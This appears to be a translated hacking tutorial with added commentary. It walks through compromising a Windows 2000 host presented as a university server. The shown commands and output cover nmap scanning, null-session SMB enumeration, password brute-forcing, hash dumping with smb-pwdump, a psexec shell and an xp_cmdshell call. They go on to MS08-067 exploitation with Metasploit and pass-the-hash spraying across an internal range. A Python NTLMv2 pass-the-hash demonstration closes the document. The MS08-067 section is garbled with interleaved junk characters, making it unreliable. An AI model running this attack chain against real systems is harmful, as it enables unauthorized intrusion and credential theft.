Guangxi Normal University site http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

// Note: the 08:00:27 OUI (registered to "Cadmus Computer Systems") is the VirtualBox range, the latency is well under a millisecond, 445/tcp fingerprints as Windows 2000 and no 80/tcp is open. Despite the public address, the host being worked on is a Windows 2000 VM on the local segment, not a live web server.
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scripts that ship with Nmap

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

// Note: no credentials were supplied, so the user list came back over an anonymous (null) session to IPC$, which Windows 2000 permits with its default RestrictAnonymous setting. TsInternetUser is the built-in Terminal Services Internet Connector account, another Windows 2000 tell. Adding -p 139,445 to these script runs avoids repeating the full 1000-port scan each time.

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

// Note: "Anonymous access: READ" on IPC$ is the null session itself; it is what let smb-enum-users walk the SAM without a password. ADMIN$ and C$ are the default administrative shares and need real credentials, which the next step goes after.

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// recover user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

// Note: with no userdb/passdb arguments smb-brute falls back to the word lists in nselib/data (usernames.lst and passwords.lst), which is enough here because Administrator has an empty password and test uses 123456. Against anything with an account lockout policy, check the threshold before letting a brute-forcer loose.

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

// Note: smb-pwdump lives in the experimental nmap-exp tree, not in the release, and it works by pushing the pwdump6 binary (unpacked into nselib/data above) to the target and running it, which needs administrative rights. It succeeds with the test account, so test is a local administrator, which the psexec step below confirms. Each line is user:RID => LM hash:NT hash; "NO PASSWORD" is pwdump's rendering of the empty hash, matching the blank Administrator password smb-brute found, and the second half of test's LM hash (AAD3B435B51404EE) is the LM hash of seven NUL bytes, which gives away that the password is at most seven characters before any cracking is done.

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

// Note: PsExec installs and starts a service over ADMIN$, so this is the same administrative access smb-pwdump used, now as an interactive SYSTEM-launched cmd.exe (-e skips loading the user's profile). The osql line is shown without output and 1433/tcp was not among the open ports in the scan, so take the SQL Server step as an aside rather than something demonstrated here.
2 k2 [+ L" v9 ^5 k. \root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞8 z( l& l6 X9 H% i
! E) a& ]- K+ ?- Y$ ^
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
; x! A( Z1 C9 ^& V4 Y- _- B9 a% o E4 B5 [
Nmap scan report for bogon (202.103.242.241)
/ X- [. W0 \7 I( V* A" J; q0 f, R; W3 P9 R7 {
Host is up (0.00046s latency).! ]4 [8 i: Q3 Z; q
, b1 {1 ]& v( w; k o% }; v2 F9 r
Not shown: 993 closed ports, z& f. |" a: b7 V
* E3 j/ \6 c* QPORT STATE SERVICE
' \) B& E" c! P+ o3 W8 ^) z" j# E) {6 J% T! K. d4 ^4 D
135/tcp open msrpc
! o3 Z; d& {. p! O3 ~8 u: E3 u8 Y2 F! H$ }* @/ ~8 p# L
139/tcp open netbios-ssn: w2 F# n) I8 Z+ p4 L2 V; I
8 P& z9 v3 V" [) t: B
445/tcp open microsoft-ds
! Q' w0 g4 @' ]8 Z! A. C/ G* `5 \9 D( c
1025/tcp open NFS-or-IIS* O- K7 F; x3 K& ^; n+ d
( K3 n0 s8 o* S* Q! X: L1 {3 V* U1026/tcp open LSA-or-nterm5 r' Z3 j C ^3 l+ {% X
- O* q7 l; f) v! v2 X3372/tcp open msdtc
% E; A+ g: C( I2 N$ ?+ I. C
& e, E0 Z5 |2 Z, O L$ t3389/tcp open ms-term-serv
! m8 f8 E4 [ v* o, Q. E6 Y, c% Q, `3 F
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
7 R- R8 h4 N* X3 ^
! O( q) m, F- o& OHost script results:0 c9 v. f3 x6 J" b0 J7 p
|) ^7 b) B& N& T
| smb-check-vulns:0 C- u" \( a2 h' s& S# J& t/ M
& K. ~# @0 U1 h8 n$ A6 D|_ MS08-067: VULNERABLE q3 t" p* Y( k
1 Q5 l2 y5 E5 k4 S& }/ _: w6 S
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
- t8 \, }* R/ U( ^% y1 }' ^
" P1 h6 }7 D& l+ T: O- \root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出" N% F' ]8 |# t8 W5 B2 k$ @
5 J2 R4 t$ P" F, O+ a& w6 K# zmsf > search ms08
* a. B, T7 R2 [; `4 Y$ O
/ U7 X# q( D1 x& ]msf > use exploit/windows/smb/ms08_067_netapi
$ \$ ~6 f% l0 e2 a4 W
) g+ E: K1 A( lmsf exploit(ms08_067_netapi) > show options& {5 Y+ `: p* T d6 X9 c9 E# y
3 a# G, |1 A9 Q: h8 L
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241 V0 d. R' f i
* O- A8 t1 v5 M! \2 b0 R8 d) p# t
msf exploit(ms08_067_netapi) > show payloads
1 y% H) U) K4 h k# l! N4 ?4 u
# a: {( S, n1 s9 R3 t8 L6 B# z, `msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
* x; P: s/ G, G* G% O: N1 G u, l) F/ e+ r% J ]) n0 R- Z9 y" E. B/ h
msf exploit(ms08_067_netapi) > exploit- U) q: U" G/ N$ y) s2 j# n
( Y2 |% A$ M# R5 a8 H4 i Tmeterpreter >
- [& J8 s5 {4 Z" F2 }" c
: V) u. B$ ]) k+ yBackground session 2? [y/N] (ctrl+z)
: W! }9 A5 `5 D' w, a. [2 ~1 U4 e( u3 y9 y+ S0 q
msf exploit(ms08_067_netapi) > sessions -l, I8 ~: f# L/ Y( e5 K9 q7 P2 r
* e4 t, w5 D0 o, ~
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try the usernames and the captured hash against the whole internal range

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack succeeded: a simple msf + nmap attack ~~

// Note: Nmap's SMB authentication library accepts a 32-hex-character "password" as an LM/NT hash and uses it directly, so the dumped hash can go into passdb without being cracked (pass-the-hash). Two things to keep in mind when reading the result: the only hit shown is the blank Administrator password, the same finding as before, and the test hash produced no login on this host; and the MAC address is the same VirtualBox NIC as 202.103.242.241, so 192.168.1.105 is the same VM reached on its private address, not a second machine.
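The reason the hash alone is enough to log in is that NTLM never transmits or uses the password itself, only a function of the hash. The following is an added example, not code from the original post or from Nmap: it walks one NTLMv2 challenge-response exchange (MS-NLMP section 3.3.2) with both sides written out, using the NT hash smb-pwdump printed for test and the domain name smb-enum-users returned. NTLMv2 is used rather than the LM/NTLMv1 path the Windows 2000 target actually negotiates because it needs only HMAC-MD5 from the standard library (LM and NTLMv1 responses are DES-based); the pass-the-hash principle is the same. The server challenge, client challenge, timestamp and the empty target-info blob are constructed values, and the function names are the author's own.

```python
"""Pass-the-hash, NTLMv2 edition: client and server both derive the proof from
the NT hash, so a dumped hash authenticates without the password.
Added example; challenges, timestamp and target info are constructed."""
import hashlib
import hmac
import os
import struct

TEST_NT_HASH = bytes.fromhex("32ED87BDB5FDC5E9CBA88547376818D4")   # 'test' from smb-pwdump above
DOMAIN = "PG-F289F9A8EF3E"                                          # from smb-enum-users above
SAMPLE_TIMESTAMP = 0x01CCF6A0B0000000                               # constructed FILETIME value


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(key=NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, target_info: bytes, timestamp: int) -> bytes:
    """Client side. Returns NTProofStr || temp; the password never enters the computation."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    nt_proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return nt_proof + temp


def server_verify(stored_nt_hash: bytes, user: str, domain: str,
                  server_challenge: bytes, response: bytes) -> bool:
    """Server side: recompute NTProofStr from the hash it stores and compare in constant time."""
    nt_proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


def attempt_login(presented_hash: bytes, user: str = "test", domain: str = DOMAIN) -> bool:
    """One full exchange: the server issues a fresh challenge, the client answers with only a hash."""
    server_challenge = os.urandom(8)
    response = ntlmv2_response(presented_hash, user, domain, server_challenge,
                               os.urandom(8), b"", SAMPLE_TIMESTAMP)
    return server_verify(TEST_NT_HASH, user, domain, server_challenge, response)


if __name__ == "__main__":
    print("dumped hash accepted:", attempt_login(TEST_NT_HASH))
    print("random hash accepted:", attempt_login(bytes(16)))
```

The fresh server challenge is what stops a captured response from being replayed, but it does nothing against an attacker who holds the hash itself, which is why the defence is to keep hashes out of reach (no shared local administrator passwords across hosts, no LM storage) rather than to rely on the challenge.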